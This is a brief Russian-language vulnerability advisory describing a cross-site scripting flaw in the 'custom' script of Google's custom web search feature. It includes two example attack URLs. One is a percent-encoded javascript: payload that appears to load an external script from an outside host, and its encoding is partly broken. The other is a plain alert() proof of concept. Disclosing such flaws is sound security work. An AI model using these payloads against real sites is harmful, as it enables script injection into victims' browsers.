Программа: custom web search feature
Уязвимость обработки внешних данных обнаружена в Google в custom web search feature. Удаленный атакующий может выполнить произвольный HTML код в браузере жертвы.
Уязвимость существует в сценарии ‘custom’. Удаленный атакующий может создать специальным образом URL и выполнить XSS.
Пример:
http://[target]/custom?cof=L:%6a%61%76%61% 73%63%72%69%70%74%3a%6a%61%76%61
%73%63%72%69%70%74%3a%64%6f%63%7 5%6d%65%6e%74%2e%61%70%70%65%6e% 64%43%68%69%9%70%74%27%29%29%2e%
73%72%63%3d%27%68%74%74%70%3a%2f% 2f%6a%69%62%62%65%72%69%6e%67%2e%
63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27
http://[target]/custom?cof=L:javascrip t:javascript:alert('EEK!')
